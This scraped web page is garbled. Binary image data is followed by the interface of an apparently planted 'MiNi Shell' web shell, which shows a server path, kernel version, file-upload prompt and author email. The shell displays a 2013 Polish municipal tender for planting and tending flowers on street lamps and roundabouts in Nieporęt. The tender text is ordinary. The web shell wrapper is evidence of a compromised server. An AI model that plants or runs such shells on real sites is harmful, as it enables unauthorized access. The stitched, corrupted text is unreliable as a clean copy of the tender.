JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130301/32493-N-2013.html

<p class="kh_header"><b>Nieporęt: Obsadzenie i pielęgnacja roślin w donicach zawieszanych na latarniach ulicznych oraz na rabatach kwiatowych na terenie Gminy Nieporęt.</b><br>
<b>Numer ogłoszenia: 32493 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nieporęt reprezentowana przez Wójta , Pl. Wolności 1, 05-126 Nieporęt, woj. mazowieckie, tel. 022 7670416, 7670442, faks 022 7670441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nieporet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsadzenie i pielęgnacja roślin w donicach zawieszanych na latarniach ulicznych oraz na rabatach kwiatowych na terenie Gminy Nieporęt..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zgodnie ze Wspólnym Słownikiem zamówień niniejsze zamówienie oznaczone jest kodem CPV 
-77310000-6- usługi sadzenia roślin oraz utrzymania terenów zielonych.
2. Zamówienie dotyczy wykonania i pielęgnacji obsadzeń:
    a) donic o średnicy 24 cm, zawieszanych na latarniach ulicznych,
    b) rabat kwiatowych na rondach drogowych w Nieporęcie i Białobrzegach.   
3. Prace pielęgnacyjne obsadzeń będą polegały na podlewaniu roślin wodą, podlewaniu roślin wodą z nawozem wieloskładnikowym, zgodnie z załącznikiem Nr 2 do umowy będącej załącznikiem Nr 1 do SIWZ, a krotność powyższych czynności będzie uzależniona od panujących warunków atmosferycznych i kondycji roślin w tym ich wzrostu, kwitnienia, wybarwiania, bieżącym odchwaszczaniu roślin w donicach i na rabatach oraz obrywaniu przekwitłych i suchych kwiatostanów. 
4. Częstotliwość zabiegów pielęgnacyjnych będzie ustalana przez Zamawiającego i Wykonawcę  w formie harmonogramu miesięcznego prac, uwzględniającego panujące warunki atmosferyczne i bieżącą kondycję roślin, a podjęcie działań przez Wykonawcę następować będzie w ciągu 24 godzin od chwili zgłoszenia.
5. Pelargonie kaskadowe posadzone na latarniach ulicznych w czasie pielęgnacji muszą osiągnąć masą ulistnienia i kwiatostanów w kolorze czerwonym, w kształcie zbliżonym do kuli o wymiarach: wysokość ok 80-90 cm i szerokości ok 120 cm, z niewidocznymi w masie liści i kwiatostanów doniczkami na uchwytach latarni. Przykładowy wygląd kształtu obsadzeń pelargonii kaskadowych na latarni ulicznej określa załącznik Nr 3 do umowy będącej załącznikiem Nr 1 do SIWZ.
6. Bratki ogrodowe i pelargonie rabatowe posadzone na rabatach w czasie pielęgnacji muszą  osiągnąć równomierną powierzchnię masy liści i kwiatostanów na rabatach w kolorach odpowiednio bratek ogrodowy żółty, niebieski/fioletowy, pelargonie rabatowe czerwone, bez  widocznych przekwitłych i suchych kwiatostanów.  
7. Koszt zakupu materiału roślinnego do nasadzeń ponosi Wykonawca odpowiadając za jego  jakość. 
8. Zakres rzeczowy przedmiotu zamówienia:
1)	wykonanie do dnia 20.05.2013 r. obsadzeń donic kwiatowych na latarniach  ulicznych w rozumieniu: 
- przywiezienia plastikowych donic z miejsca ich przechowywania na miejsce, gdzie zostaną wypełnione podłożem, 
- przygotowania podłoża do wypełnienia donic (wymieszanie ziemi urodzajnej z hydrożelem w ilościach zgodnych z zaleceniami producenta oraz zastosowaniem odpowiedniego nawozu wolno uwalniającego), 
- wypełnienia donic przygotowanym podłożem do wysokości 2 cm od górnej krawędzi donicy (z uwzględnieniem procesu osiadania ziemi), 
- posadzenia kwiatów zgodnie ze sztuką ogrodniczą w ilości 3 szt. kwiatów/doniczkę w gatunku pelargonia kaskadowa o kolorze czerwonym, 
- umieszczeniu wypełnionych podłożem i kwiatami plastikowych donic w metalowych uchwytach zawieszonych na latarniach ulicznych, materiał roślinny pierwszego gatunku tzn. rośliny zdrowe, mocne bez przebarwień chorobowych, rozrośnięte, w fazie kwitnienia, z dużą ilością mocno zainicjowanych pąków kwiatowych;
2)	wykonanie obsadzeń rabat kwiatowych na rondach drogowych w Nieporęcie i Białobrzegach w rozumieniu: 
-przywiezienia materiału roślinnego do obsadzeń na rabatach, 
-przygotowanie podłoża do wykonania nasadzeń, poprzez uzupełnienie ziemią urodzajną powierzchni pod nasadzenia na rondzie w Nieporęcie i usunięcie chwastów, wymiana podłoża pod nasadzenia na ziemię urodzajną pod powierzchnię nasadzeń na rondzie w Białobrzegach i usunięcie chwastów, 
- posadzenie w pierwszym nasadzeniu, w zależności od warunków atmosferycznych w okresie od 8.04.2013 r. do 12.04.2013 r. na rabatach zgodnie ze sztuką ogrodniczą kwiatów w ilości 45 szt. kwiatów m2 w gatunku bratek ogrodowy, w kolorystyce żółty,niebieski-fioletowy, materiał roślinny pierwszego gatunku tzn. rośliny zdrowe, mocne bez przebarwień chorobowych, rozrośnięte, w fazie kwitnienia, z dużą ilością mocno zainicjowanych pąków kwiatowych;
- posadzenie w drugim nasadzeniu w okresie od 1.06.2013 r. do 7.06.2013 r. na rabatach zgodnie ze sztuką ogrodniczą kwiatów w ilości 18 szt. kwiatów/m2 w gatunku pelargonia rabatowa, w kolorze czerwonym, materiał roślinny pierwszego gatunku tzn. rośliny zdrowe, mocne bez przebarwień chorobowych, rozrośnięte, w fazie kwitnienia, z dużą ilością mocno zainicjowanych pąków kwiatowych;
3)	mulczowanie (korowanie) powierzchni pomiędzy roślinami korą ogrodniczą (bratek ogrodowy grubość warstwy 2 cm, pelargonia rabatowa grubość warstwy 3 cm),
4)	podlewanie roślin (pelargonia kaskadowa) na latarniach ulicznych wodą zgodnie z załącznikiem Nr 2 do umowy będącej załącznikiem Nr 1 do SIWZ, w przypadku wystąpienia wysokich  temperatur lub dużej ilości opadów atmosferycznych Zamawiający może ograniczyć lub zwiększyć częstotliwość podlewań oraz stała pielęgnacja roślin polegająca na odchwaszczaniu donic oraz obrywaniu przekwitłych i suchych kwiatostanów w okresie od 20.05.2013 r. do 21.10.2013 r.;
5)	podlewanie roślin (bratek ogrodowy, pelargonia rabatowa) na rabatach kwiatowych wodą w okresie wysadzenia (kwiecień-październik) zgodnie z załącznikiem Nr 2 do umowy będącej załącznikiem Nr 1 do SIWZ, w przypadku wystąpienia wysokich temperatur lub dużej ilości opadów atmosferycznych Zamawiający może ograniczyć lub zwiększyć częstotliwość podlewań oraz stała pielęgnacja roślin polegająca na odchwaszczaniu, obrywaniu przekwitłych i suchych kwiatostanów;
6)	podlewanie wodą z nawozem roślin na latarniach ulicznych (pelargonia kaskadowa) nawozami mineralnymi wieloskładnikowymi zgodnie z załącznikiem Nr 2 do umowy będącej załącznikiem Nr 1 do SIWZ, krotność nawożenia może być zwiększona w zależności od kondycji roślin, należy używać nawozów wpływających na wzrost roślin, kwitnienie, wybarwianie w okresie od 20.05.2013 r. do 21.10.2013 r.;
7)	podlewanie wodą z nawozem roślin na rabatach kwiatowych (bratek ogrodowy i pelargonia rabatowa) nawozami mineralnymi wieloskładnikowymi zgodnie z załącznikiem Nr 2 do umowy będącej załącznikiem Nr 1 do SIWZ, w zależności od kondycji roślin należy używać nawozów wpływających na wzrost roślin, kwitnienie, wybarwianie w okresie wegetacyjnym roślin, realizowane zgodnie ze zgłoszeniem Zamawiającego. Krotność nawożenia może być zwiększona w zależności od kondycji roślin, należy używać nawozów wpływających na wzrost roślin, kwitnienie, wybarwianie;
8)	uzupełnianie i wymiana roślin obumarłych:
- z przyczyn obumarcia leżących po stronie Wykonawcy spowodowane niewłaściwą pielęgnacją lub doborem wadliwego materiału roślinnego, wymiana roślin na koszt Wykonawcy,
- w przypadku potwierdzonego zniszczenia roślin przez osoby trzecie, wymiana roślin, realizowana  w okresie sezonu wegetacyjnego roślin, zgodnie ze zgłoszeniem Zamawiającego, 
9)	demontaż donic z uchwytów zawieszonych na latarniach i przewiezienie ich na miejsce przechowywania wskazane przez Zamawiającego na terenie gminy do dnia 31.10.2013 r.

9. Wykaz latarni, na których mają być zawieszone donice oraz powierzchnie rabat do obsadzeń stanowi załącznik do umowy, będącej załącznikiem nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się, że w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał przynajmniej dwie usługi pielęgnacji pelargonii kaskadowych, w obsadzeniach ulicznych o wartości każdej z usług minimum 50 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje sprzętem technicznym niezbędnym do wykonywania podlewania(nawożenia)roślin posadzonych w donicach umieszczonych na latarniach ulicznych - pojazd z jednym zbiornikiem o pojemności min. 1000 litrów i pompę z osprzętem do podlewania donic na latarniach ulicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 50 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
1.   Wykonawca składa w postępowaniu następujące dokumenty i oświadczenia:
1) oświadczenie zgodnie z art. 22 ust. 1 ustawy złożone zgodnie ze wzorem określonym w załączniku nr 3 do SIWZ;
2) wykaz narzędzi,wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;
3) wykaz wykonanych, a w przypadku świadczenia okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, zgodnie ze wzorem określonym w załączniku nr 6 do SIWZ; 
4) opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę min. 50 000 zł wraz z dowodem potwierdzającym opłacenie polisy,
II. WYKAZ DOKUMENTÓW JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA, ŻE NIE PODLEGAJĄ WYKLUCZENIU Z POSTĘPOWANIA 
1. Wykonawca składa w postępowaniu następujące dokumenty i oświadczenia:
1) oświadczenie zgodnie z art. 24 ust. 1 ustawy złożone zgodnie ze wzorem określonym w załączniku nr 4 do SIWZ;
III. 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- oświadczenie o ewentualnym powierzeniu części zamówienia podwykonawcom, zgodnie z wzorem określonym w załączniku nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nieporet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nieporęt
Plac Wolności 1
05-126 Nieporęt.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2013 godzina 08:30, miejsce: Urząd Gminy Nieporęt
 Plac Wolności 1
05-126 Nieporęt.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com